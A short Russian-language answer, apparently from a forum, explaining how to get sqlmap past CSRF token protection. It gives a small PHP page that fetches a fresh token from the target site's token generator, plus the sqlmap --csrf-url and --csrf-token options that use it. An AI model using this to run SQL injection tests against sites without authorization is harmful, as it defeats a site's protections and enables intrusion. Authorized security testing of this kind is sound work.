Решено создание пользовательской страницы php, которая получает токен от site , обрабатывает ее и предоставляет в формате для sqlmap. Предполагая, что токен-генератор. php отвечает только простой текстовой строкой:
# bypass-csrf.php
<?php
$t = file_get_contents('http://_site_/token-generator.php');
echo '<input type="hidden" name="token" value="' . $t . '">';
echo $t;
?>
Параметры sqlmap: --csrf-url="http://127.0.0.1/bypass-csrf.php" --csrf-token="token"
dk